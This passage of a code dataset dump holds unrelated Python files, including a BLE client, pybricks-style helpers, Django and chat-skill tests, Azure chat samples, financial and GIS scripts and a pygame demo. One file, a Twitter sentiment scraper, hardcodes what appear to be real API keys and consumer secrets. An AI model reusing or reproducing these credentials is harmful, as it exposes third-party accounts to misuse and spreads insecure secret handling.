BleakClient(device)\n await self.client.connect(disconnected_callback=self.disconnected_handler)\n await self.client.start_notify(self.char_tx_UUID, self.data_handler)\n print(\"Connected successfully!\")\n self.connected = True\n\n async def disconnect(self):\n \"\"\"Disconnects the client from the server.\"\"\"\n await self.client.stop_notify(self.char_tx_UUID)\n if self.connected:\n self.logger.debug(\"Disconnecting...\")\n await self.client.disconnect()\n\n async def write(self, data, pause=0.05, with_response=False):\n \"\"\"Write bytes to the server, split to chunks of maximum mtu size.\n\n Arguments:\n data (bytearray):\n Data to be sent to the server.\n pause (float):\n Time between chunks of data.\n with_response (bool):\n Write with or without reponse.\n \"\"\"\n # Chop data into chunks of maximum tranmission size\n chunks = [data[i: i + self.mtu] for i in range(0, len(data), self.mtu)]\n\n # Send the chunks one by one\n for chunk in chunks:\n self.logger.debug(\n \"TX CHUNK: {0}, {1} response\".format(\n chunk, \"with\" if with_response else \"without\"\n )\n )\n # Send one chunk\n await self.client.write_gatt_char(\n self.char_rx_UUID,\n bytearray(chunk),\n with_response\n )\n # Give server some time to process chunk\n await asyncio.sleep(pause)\n\n\nclass BLERequestsConnection(BLEConnection):\n \"\"\"Sends messages and awaits replies of known length.\n\n This can be used for devices with known commands and known replies, such\n as some bootloaders to update firmware over the air.\n \"\"\"\n\n def __init__(self, UUID):\n \"\"\"Initialize the BLE Connection.\"\"\"\n self.reply_ready = asyncio.Event()\n self.prepare_reply()\n\n super().__init__(UUID, UUID, 1024)\n\n def data_handler(self, sender, data):\n \"\"\"Handles new incoming data and raise event when a new reply is ready.\n\n Arguments:\n sender (str):\n Sender uuid.\n data (bytes):\n Bytes to process.\n \"\"\"\n self.logger.debug(\"DATA {0}\".format(data))\n self.reply = data\n self.reply_ready.set()\n\n def prepare_reply(self):\n \"\"\"Clears existing reply and wait event.\n\n This is usually called prior to the write operation, to ensure we\n receive some of the bytes while are still awaiting the sending process.\n \"\"\"\n self.reply = None\n self.reply_ready.clear()\n\n async def wait_for_reply(self, timeout=None):\n \"\"\"Awaits for given number of characters since prepare_reply.\n\n Arguments:\n timeout (float or None):\n Time out to await. Same as asyncio.wait_for.\n\n Returns:\n bytearray: The reply.\n\n Raises\n TimeOutError. Same as asyncio.wait_for.\n \"\"\"\n # Await for the reply ready event to be raised.\n await asyncio.wait_for(self.reply_ready.wait(), timeout)\n\n # Return reply and clear internal buffer\n reply = self.reply\n self.prepare_reply()\n return reply\n","sub_path":"pybricksdev/ble.py","file_name":"ble.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"253724801","text":"import json\nimport urllib\nimport indicoio\nfrom application_only_auth import Client\n\nindicoio.config.api_key = '5aeda81420d27634e0fff46cab9509b3'\nTWITTER_CONSUMER_KEY = 's0bSUZphHdrbckdSFxmS83AV0'\nTWITTER_CONSUMER_SECRET = 'Y8NfaqFnhYhj8lBH4aYXAb85GdqyLSgumuApcjyjZPelnSRRyX'\n\nclass TweetScrape:\n def __init__(self):\n self.client = Client(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)\n self.status = None\n\n def get_twitter_sentiment(self, handle):\n tweets = self.get_tweets(handle)\n raw_tweets = [tweet['text'] for tweet in tweets['statuses']]\n return self.get_sentiment_average(raw_tweets)\n\n def get_tweets(self, handle):\n search_string = 'https://api.twitter.com/1.1/search/tweets.json?'\n search_string += 'q='+urllib.quote(handle)\n search_string += '&count=100'\n tweets = self.client.request(search_string)\n self.status = self.client.rate_limit_status()\n return tweets\n\n def get_sentiment_average(self, raw_tweets):\n # Will give a number from 0 to 1 based on how negative or positive each tweet is\n sentiment_scores = indicoio.sentiment_hq(raw_tweets)\n avg = sum(sentiment_scores) / len(sentiment_scores)\n return avg\n","sub_path":"tweetscrape/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"237667027","text":"\"\"\"\n定义一个类,该类具有一个类参数和一个相同的实例参数\n\"\"\"\n\n\nclass Person(object):\n name = \"haha\"\n\n def __init__(self, name=None):\n self.name = name\n\n\njerry = Person(\"Jerrfy\")\nprint(\"%s name is %s\" % (Person.name, jerry.name))\n\nprint(\"-------\")\n\n# 两种方式\nnicio = Person()\nnicio.name = \"fsdf\"\nprint(\"%s name is %s\" % (Person.name, nicio.name))","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"584576178","text":"import json\nimport unittest\n\nfrom ovos_tskill_fakewiki import FakeWikiSkill\nfrom ovos_utils.messagebus import FakeBus, Message\n\n\nclass TestDialog(unittest.TestCase):\n def setUp(self):\n self.bus = FakeBus()\n self.bus.emitted_msgs = []\n\n def get_msg(msg):\n self.bus.emitted_msgs.append(json.loads(msg))\n\n self.bus.on(\"message\", get_msg)\n\n self.skill = FakeWikiSkill()\n self.skill._startup(self.bus, \"wiki.test\")\n\n self.skill.has_context = False\n\n def set_context(message):\n self.skill.has_context = True\n\n def unset_context(message):\n self.skill.has_context = False\n\n self.bus.on('add_context', set_context)\n self.bus.on('remove_context', unset_context)\n\n def test_continuous_dialog(self):\n self.bus.emitted_msgs = []\n\n # \"ask the wiki X\"\n self.assertFalse(self.skill.has_context)\n self.skill.handle_search(Message(\"search_fakewiki.intent\",\n {\"query\": \"what is the speed of light\"}))\n\n self.assertEqual(self.bus.emitted_msgs[0],\n {'context': {'skill_id': 'wiki.test'},\n 'data': {'context': 'wiki_testFakeWikiKnows',\n 'origin': '',\n 'word': 'what is the speed of light'},\n 'type': 'add_context'})\n self.assertEqual(self.bus.emitted_msgs[-1],\n {'context': {'skill_id': 'wiki.test'},\n 'data': {'expect_response': False,\n 'lang': 'en-us',\n 'meta': {'skill': 'wiki.test'},\n 'utterance': 'answer 1'},\n 'type': 'speak'})\n\n # \"tell me more\"\n self.assertTrue(self.skill.has_context)\n self.skill.handle_tell_more(Message(\"FakeWikiMore\"))\n\n self.assertEqual(self.bus.emitted_msgs[-1],\n {'context': {'skill_id': 'wiki.test'},\n 'data': {'expect_response': False,\n 'lang': 'en-us',\n 'meta': {'skill': 'wiki.test'},\n 'utterance': 'answer 2'},\n 'type': 'speak'})\n self.assertTrue(self.skill.has_context)\n\n # \"tell me more\" - no more data dialog\n self.skill.handle_tell_more(Message(\"FakeWikiMore\"))\n\n self.assertEqual(self.bus.emitted_msgs[-2][\"type\"], \"speak\")\n self.assertEqual(self.bus.emitted_msgs[-2][\"data\"][\"meta\"],\n {'data': {}, 'dialog': 'thats all', 'skill': 'wiki.test'})\n\n # removal of context to disable \"tell me more\"\n self.assertEqual(self.bus.emitted_msgs[-1],\n {'context': {'skill_id': 'wiki.test'},\n 'data': {'context': 'wiki_testFakeWikiKnows'},\n 'type': 'remove_context'})\n self.assertFalse(self.skill.has_context)\n","sub_path":"test/unittests/common_query/test_continuous_dialog.py","file_name":"test_continuous_dialog.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"564909072","text":"\"\"\"\nVerify that ``python manage.py wait_for_database`` works fine.\n\"\"\"\nfrom unittest.mock import patch\nfrom django.db.utils import OperationalError\n\nimport pytest\n\nfrom django_probes.management.commands.wait_for_database \\\n import wait_for_database\n\nCLI_PARAMS = {\n 'wait_when_down': 1,\n 'wait_when_alive': 1,\n 'stable': 3,\n 'timeout': 1,\n 'database': 'default',\n}\n\n\n@patch('django.db.connection.cursor', side_effect=OperationalError())\ndef test_exception_caught_when_connection_absent(mock_db_cursor):\n \"\"\"\n When database connection is absent related errors are caught.\n \"\"\"\n with pytest.raises(TimeoutError):\n wait_for_database(**CLI_PARAMS)\n\n assert mock_db_cursor.called\n\n\n@patch('django.db.connection.cursor')\ndef test_loops_stable_times(mock_db_cursor):\n \"\"\"\n Database connection must be stable some consecutive times in a row.\n \"\"\"\n wait_for_database(**CLI_PARAMS)\n\n assert mock_db_cursor.call_count == CLI_PARAMS['stable'] + 1\n","sub_path":"tests/unit/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"436053810","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom char_feature_extractor import CharFeatureExtractor\n\n\nclass CharKeywordFeatureExtractor(CharFeatureExtractor):\n \"\"\"\n base特征是字,添加关键词特征\n \"\"\"\n\n def __init__(self, content='', tagged_content='', keyword='', left_char_size=0, right_char_size=0):\n assert keyword != '' and (left_char_size != 0 or right_char_size != 0)\n self._keyword = keyword.decode('utf-8') if type(keyword).__name__ == 'str' else keyword\n self._l_char_size = left_char_size\n self._r_char_size = right_char_size\n super(CharFeatureExtractor, self).__init__(\n content=content, tagged_content=tagged_content)\n\n def add_features(self, base_features):\n content = ''.join(base_features)\n features = []\n for index in xrange(len(base_features)):\n found = self._find_keyword_in_context(index, content, self._keyword, self._l_char_size, self._r_char_size)\n features.append([found])\n return features\n\n @staticmethod\n def _find_keyword_in_context(index, content, keyword, left_char_size, right_char_size):\n left_border = index - left_char_size if index - left_char_size >= 0 else 0\n right_border = index + right_char_size if index + right_char_size < len(content) else len(content) - 1\n context = content[left_border: right_border + 1]\n found = 1 if context.find(keyword) != -1 else 0\n return found\n","sub_path":"extract_framework/feature_extractors/char_keyword_feature_extractor.py","file_name":"char_keyword_feature_extractor.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291903200","text":"\"\"\"\nScript: Get raster info\nAuthor: Colin Stief\n\n\"\"\"\n\n## Import libraries\ntry:\n # Core\n import os\n import sys\n import subprocess\n\n # User\n import GeoUtils\n\nexcept ImportError:\n print('Could not import necessary libraries')\n sys.exit()\n\n\ndef main():\n \"\"\"Main script\"\"\"\n\n ## Get list of shapefiles from data directory\n data_directory = os.path.realpath('../maryland/imagery/Ortho_2012')\n # data_dict = GeoUtils.horde_files(data_directory, ['jp2'])\n data_dict = GeoUtils.horde_files(data_directory, ['tif'])\n\n ## Loop through list and add to PostGIS\n for name, fullpath in data_dict.items():\n\n print('Processing ' + fullpath)\n\n # subprocess.call([\n # 'gdalwarp',\n # '-s_srs', 'EPSG:2261', # Source projection; this uses custom .prj file\n # '-t_srs', 'EPSG:4326', # Target projection\n # fullpath,\n # os.path.join(data_directory, name + '_rprj.tif') # Output raster\n # ])\n\n subprocess.call([\n 'gdaladdo',\n '-r', 'nearest',\n fullpath,\n '2 4 8 16'\n ])\n\n # subprocess.call([\n # 'gdal_translate',\n # '-of', 'GTiff',\n # '-co', 'TILED=YES',\n # '-co', 'COMPRESS=NONE',\n # '-co', 'PHOTOMETRIC=RGB',\n # fullpath,\n # os.path.join(data_directory, name + '.tif')\n # ])\n\n\n\n\n## Prevent run on import\nif __name__ == '__main__':\n main()\n","sub_path":"python/gis/gdal-ogr/raster_convert.py","file_name":"raster_convert.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"411546086","text":"from nsepy import get_history\r\nimport nsepy as nsepy\r\nfrom datetime import date,timedelta\r\n\r\ntoday_date = date.today()-timedelta(days=1)\r\nprint(today_date)\r\n\r\nexpiry = sorted(nsepy.get_expiry_date(year=date.today().year, month=date.today().month))\r\nprint(expiry)\r\n\r\nfor i in expiry:\r\n if i >= today_date:\r\n expiry_option = i\r\n break\r\nprint(expiry_option)\r\n\r\noption = ['CE','PE']\r\n\r\n# generating strike price\r\nstrike = []\r\nfor i in range(15000, 15200, 50):\r\n strike.append(i)\r\nprint(strike)\r\n\r\n\r\noi_ce = {}\r\noi_pe = {}\r\n\r\n\r\n\r\nfor opt in option:\r\n for stk in strike:\r\n\r\n nifty_opt = get_history(symbol=\"NIFTY\",\r\n start=today_date,\r\n end=today_date,\r\n index=True,\r\n option_type=opt,\r\n strike_price=stk,\r\n expiry_date=expiry_option)\r\n # print(nifty_opt)\r\n\r\n for i in range(len(nifty_opt)):\r\n\r\n # print(opt,stk,end=\" \")\r\n # print(nifty_opt.index[i],end=' ')\r\n # print(nifty_opt['Open Interest'][i])\r\n oi=nifty_opt['Open Interest'][i]\r\n # print(oi)\r\n\r\n if opt == \"CE\":\r\n oi_ce[stk] = oi\r\n # print(oi_ce)\r\n elif opt == \"PE\":\r\n oi_pe[stk] = oi\r\n # print(oi_pe)\r\n\r\nprint(oi_pe)\r\nprint(oi_ce)\r\n\r\ndict2 = {'CE': oi_ce}\r\nprint(dict2)\r\n\r\ndict3 = {'PE': oi_ce}\r\nprint(dict3)\r\n\r\ndict4 = {'CE':oi_ce,'PE':oi_pe }\r\nprint(dict4)\r\n\r\nlist1 = [dict2, dict3]\r\nprint(list1)\r\ntoday_date1 = str(today_date)\r\nprint(today_date1)\r\n\r\noi_dict = {today_date1 : list1}\r\nprint(oi_dict)\r\n\r\noi_dict1 = {today_date1 : dict4}\r\nprint(oi_dict1)\r\n\r\nprint(oi_dict1['2021-06-03']['CE'][15050])\r\n","sub_path":"beta1/nse_oi.py","file_name":"nse_oi.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"259601495","text":"# Following the template given by pypa \n# github.com/pypa/sampleproject\n\nfrom setuptools import setup, find_packages\n\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n LONG_DESCR = f.read()\n\n\nsetup(\n name=\"testgen\",\n author=\"Sam Morley\",\n version=\"0.1.0\",\n description=\"Automatic unit test generator for Python code\",\n long_description=LONG_DESCR,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/inakleinbottle/testgen\",\n author_email=\"sam@inakleinbottle.com\",\n packages=find_packages(exclude=[\"tests\"]),\n python_requires=\">=3.6\",\n extras_require={\n \"test\": [\"pytest\"],\n },\n entry_points={\n \"console_scripts\": [\"testgen=testgen.cli:main\"],\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"73286301","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pickle\n\nd = dict(name='bob', age=20, score=88)\nprint(d)\nda = pickle.dumps(d)\nprint(da)\n\nreborn = pickle.loads(da)\nprint(reborn)\n\n########################\nimport json\nd = dict(name='Sun', age=40, score=58)\nprint(d)\nda = json.dumps(d)\nprint('JSON Data is a str:{}'.format(da))\nreborn = json.loads(da)\nprint(reborn)\n\nclass Stu(object):\n def __init__(self, name, age, score):\n self.name = name\n self.age = age\n self.score = score\n \n def __str__(self):\n return 'Stu object(%s, %s, %s)'%(self.name, self.age, self.score)\n\ns = Stu('Hua', 35, 99)\nstd_data = json.dumps(s, default=lambda obj:obj.__dict__)\nprint('Dump Stu:', std_data)\nrebuild = json.loads(std_data, object_hook=lambda d:Stu(d['name'],d['age'],d['score']))\nprint(rebuild)\nre = json.loads(std_data)\nprint(re)","sub_path":"use_json.py","file_name":"use_json.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440752023","text":"class Solution:\n\n # @param s, a string\n # @return an integer\n def titleToNumber(self, s):\n reverse, factor, number = s[::-1], 1, 0\n for p in reverse:\n number += (ord(p) - ord('A') + 1) * factor\n factor *= 26\n return number\n","sub_path":"leetcode/python/titleToNumber.py","file_name":"titleToNumber.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156058826","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\n\"\"\"\nFILE: chat_thread_client_sample.py\nDESCRIPTION:\n These samples demonstrate create a chat thread client, to update\n chat thread, get chat message, list chat messages, update chat message, send\n read receipt, list read receipts, delete chat message, add participants, remove\n participants, list participants, send typing notification\n You need to use azure.communication.configuration module to get user access\n token and user identity before run this sample\n\nUSAGE:\n python chat_thread_client_sample.py\n Set the environment variables with your own values before running the sample:\n 1) AZURE_COMMUNICATION_SERVICE_ENDPOINT - Communication Service endpoint url\n 2) TOKEN - the user access token, from token_response.token\n 3) USER_ID - the user id, from token_response.identity\n\"\"\"\n\n\nimport os\n\n\nclass ChatThreadClientSamples(object):\n from azure.communication.identity import CommunicationIdentityClient\n connection_string = os.environ.get(\"AZURE_COMMUNICATION_SERVICE_CONNECTION_STRING\", None)\n if not connection_string:\n raise ValueError(\"Set AZURE_COMMUNICATION_SERVICE_CONNECTION_STRING env before run this sample.\")\n\n identity_client = CommunicationIdentityClient.from_connection_string(connection_string)\n user = identity_client.create_user()\n tokenresponse = identity_client.issue_token(user, scopes=[\"chat\"])\n token = tokenresponse.token\n\n endpoint = os.environ.get(\"AZURE_COMMUNICATION_SERVICE_ENDPOINT\", None)\n if not endpoint:\n raise ValueError(\"Set AZURE_COMMUNICATION_SERVICE_ENDPOINT env before run this sample.\")\n\n _thread_id = None\n _message_id = None\n new_user = identity_client.create_user()\n\n def create_chat_thread_client(self):\n # [START create_chat_thread_client]\n from datetime import datetime\n from azure.communication.chat import (\n ChatClient,\n CommunicationUserIdentifier,\n CommunicationTokenCredential,\n CommunicationTokenRefreshOptions,\n ChatThreadParticipant\n )\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_client = ChatClient(self.endpoint, CommunicationTokenCredential(refresh_options))\n topic = \"test topic\"\n participants = [ChatThreadParticipant(\n user=self.user,\n display_name='name',\n share_history_time=datetime.utcnow()\n )]\n chat_thread_client = chat_client.create_chat_thread(topic, participants)\n # [END create_chat_thread_client]\n self._thread_id = chat_thread_client.thread_id\n print(\"chat_thread_client created\")\n\n def update_topic(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START update_topic]\n topic = \"updated thread topic\"\n chat_thread_client.update_topic(topic=topic)\n # [END update_topic]\n\n print(\"update_chat_thread succeeded\")\n\n def send_message(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START send_message]\n from azure.communication.chat import ChatMessagePriority\n\n content = 'hello world'\n sender_display_name = 'sender name'\n\n send_message_result_id = chat_thread_client.send_message(\n content,\n sender_display_name=sender_display_name)\n\n send_message_result_w_type_id = chat_thread_client.send_message(\n content,\n sender_display_name=sender_display_name, chat_message_type=ChatMessageType.TEXT)\n # [END send_message]\n\n self._message_id = send_message_result_id\n print(\"send_chat_message succeeded, message id:\", self._message_id)\n print(\"send_message succeeded with type specified, message id:\", send_message_result_w_type_id)\n\n def get_message(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START get_message]\n chat_message = chat_thread_client.get_message(self._message_id)\n # [END get_message]\n\n print(\"get_chat_message succeeded, message id:\", chat_message.id, \\\n \"content: \", chat_message.content)\n\n def list_messages(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START list_messages]\n from datetime import datetime, timedelta\n start_time = datetime.utcnow() - timedelta(days=1)\n chat_messages = chat_thread_client.list_messages(results_per_page=1, start_time=start_time)\n\n print(\"list_messages succeeded with results_per_page is 1, and start time is yesterday UTC\")\n for chat_message_page in chat_messages.by_page():\n l = list(chat_message_page)\n print(\"page size: \", len(l))\n # [END list_messages]\n\n def update_message(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START update_message]\n content = \"updated content\"\n chat_thread_client.update_message(self._message_id, content=content)\n # [END update_message]\n\n print(\"update_chat_message succeeded\")\n\n def send_read_receipt(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START send_read_receipt]\n chat_thread_client.send_read_receipt(self._message_id)\n # [END send_read_receipt]\n\n print(\"send_read_receipt succeeded\")\n\n def list_read_receipts(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START list_read_receipts]\n read_receipts = chat_thread_client.list_read_receipts()\n print(\"list_read_receipts succeeded, receipts:\")\n for read_receipt in read_receipts:\n print(read_receipt)\n # [END list_read_receipts]\n\n def delete_message(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START delete_message]\n chat_thread_client.delete_message(self._message_id)\n # [END delete_message]\n print(\"delete_chat_message succeeded\")\n\n def list_participants(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START list_participants]\n chat_thread_participants = chat_thread_client.list_participants()\n print(\"list_chat_participants succeeded, participants: \")\n for chat_thread_participant in chat_thread_participants:\n print(chat_thread_participant)\n # [END list_participants]\n\n def add_participant(self):\n from azure.communication.chat import ChatThreadClient, CommunicationTokenCredential, \\\n CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options),\n self._thread_id)\n # [START add_participant]\n from azure.communication.chat import ChatThreadParticipant\n from datetime import datetime\n new_chat_thread_participant = ChatThreadParticipant(\n user=self.new_user,\n display_name='name',\n share_history_time=datetime.utcnow())\n chat_thread_client.add_participant(new_chat_thread_participant)\n # [END add_participant]\n print(\"add_chat_participant succeeded\")\n\n def add_participants(self):\n from azure.communication.chat import ChatThreadClient, CommunicationTokenCredential, \\\n CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n\n # [START add_participants]\n from azure.communication.chat import ChatThreadParticipant\n from datetime import datetime\n new_participant = ChatThreadParticipant(\n user=self.new_user,\n display_name='name',\n share_history_time=datetime.utcnow())\n thread_participants = [new_participant]\n chat_thread_client.add_participants(thread_participants)\n # [END add_participants]\n print(\"add_chat_participants succeeded\")\n\n def remove_participant(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationUserIdentifier, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n\n # [START remove_participant]\n chat_thread_client.remove_participant(self.new_user)\n # [END remove_participant]\n\n print(\"remove_chat_participant succeeded\")\n\n def send_typing_notification(self):\n from azure.communication.chat import ChatThreadClient, CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START send_typing_notification]\n chat_thread_client.send_typing_notification()\n # [END send_typing_notification]\n\n print(\"send_typing_notification succeeded\")\n\n def clean_up(self):\n print(\"cleaning up: deleting created users.\")\n self.identity_client.delete_user(self.user)\n self.identity_client.delete_user(self.new_user)\n\nif __name__ == '__main__':\n sample = ChatThreadClientSamples()\n sample.create_chat_thread_client()\n sample.update_topic()\n sample.send_message()\n sample.get_message()\n sample.list_messages()\n sample.update_message()\n sample.send_read_receipt()\n sample.list_read_receipts()\n sample.delete_message()\n sample.add_participant()\n sample.add_participants()\n sample.list_participants()\n sample.remove_participant()\n sample.send_typing_notification()\n sample.clean_up()\n","sub_path":"sdk/communication/azure-communication-chat/samples/chat_thread_client_sample.py","file_name":"chat_thread_client_sample.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111305722","text":"# https://www.bilibili.com/video/av19574503?p=27\n# turn ball to text ,use render to\n# when press mouse left key, the ball stop. \n# when press mouse left key and move mouse, the ball move with the mouse\n# when release mouse left key, the ball continue to move \nimport pygame,sys\nimport pygame.freetype\n\npygame.init()\nWIN_X = 500\nWIN_Y = 600\nGOLD = 255,251,0\nRED = pygame.Color('red')\nWHITE = 255,255,255\nGREEN = pygame.Color('green')\nBLACK = 0,0,0\npos = [230, 160]\n# 建立字体对象\nicon = pygame.image.load('icon.png')\npygame.display.set_icon(icon)\npygame.display.set_caption('WALL BALL')\nscreen = pygame.display.set_mode((WIN_X,WIN_Y),pygame.RESIZABLE)\n# screen = pygame.display.set_mode((WIN_X,WIN_Y),pygame.NOFRAME)\n# screen = pygame.display.set_mode((WIN_X,WIN_Y),pygame.FULLSCREEN)\n# screen = pygame.display.set_mode((WIN_X,WIN_Y))\n# f1 = pygame.freetype.Font('C://Windows//Fonts//msyh.ttc',36)\nf1 = pygame.freetype.Font(None,36)\nf1rect = f1.render_to(screen,pos,'NASA',fgcolor=GOLD,size=50)\nball_img = 'PYG02-ball.gif'\nspeedx = speedfx = 1\nspeedy = speedfy = 1\n# mark the ball's status\nstill = False\nball = pygame.image.load(ball_img)\nball_rect = ball.get_rect()\nfps = 300\nfclock = pygame.time.Clock()\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.VIDEORESIZE:\n WIN_X= event.w\n WIN_Y= event.h\n screen = pygame.display.set_mode((WIN_X,WIN_Y),pygame.RESIZABLE)\n \n if event.type == pygame.MOUSEBUTTONDOWN :\n if event.button == 1: # left key of mouse\n still = True\n if event.type == pygame.MOUSEBUTTONUP:\n still = False\n if event.button == 1: # if release, move the ball to the mouse x y\n ball_rect = ball_rect.move(event.pos[0] - ball_rect.left, event.pos[1] - ball_rect.top)\n if event.type == pygame.MOUSEMOTION:\n if event.buttons[0] == 1:\n ball_rect = ball_rect.move(event.pos[0] - ball_rect.left, event.pos[1] - ball_rect.top)\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n # control speed by direction key\n if speedy > 0:\n if event.key == pygame.K_DOWN:\n speedy -= 1\n if event.key == pygame.K_UP:\n speedy += 1\n if speedy <= 0:\n if event.key == pygame.K_DOWN:\n speedy += 1\n if event.key == pygame.K_UP:\n speedy -= 1\n if speedx > 0:\n if event.key == pygame.K_LEFT:\n speedx -= 1\n if event.key == pygame.K_RIGHT:\n speedx += 1\n if speedx <= 0:\n if event.key == pygame.K_LEFT:\n speedx += 1\n if event.key == pygame.K_RIGHT:\n speedx -= 1\n # ball_rect = rect(100,200,50,50)\n # 如果窗口没有最小化,就移动小球\n if pygame.display.get_active() and not still:\n ball_rect = ball_rect.move(speedx,speedy)\n if ball_rect.left < 0 or ball_rect.right > WIN_X:\n speedx = - speedx\n if ball_rect.left < 0:\n ball_rect.left = 0\n if ball_rect.right > WIN_X:\n ball_rect.right = WIN_X\n if ball_rect.top < 0 or ball_rect.bottom > WIN_Y:\n speedy = - speedy\n if ball_rect.top < 0:\n ball_rect.top = 0\n if ball_rect.bottom > WIN_Y:\n ball_rect.bottom = WIN_Y\n # print (ball_rect)\n if pos[0]<0 or pos[0] > WIN_X:\n speedfx = -speedfx\n if pos[1]<0 or pos[1] > WIN_Y:\n speedfy = -speedfy\n pos[0] = pos[0] + speedfx\n pos[1] = pos[1] + speedfy\n\n screen.fill((0,0,0))\n # render_to must be after the fill\n f1rect = f1.render_to(screen,pos,'NASA',fgcolor=GOLD,size=50)\n screen.blit(ball,ball_rect)\n pygame.display.update()\n fclock.tick(fps)\n","sub_path":"pygame/wall_ball_04_color_draw_27_wall_ball_fonts_render_to.py","file_name":"wall_ball_04_color_draw_27_wall_ball_fonts_render_to.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 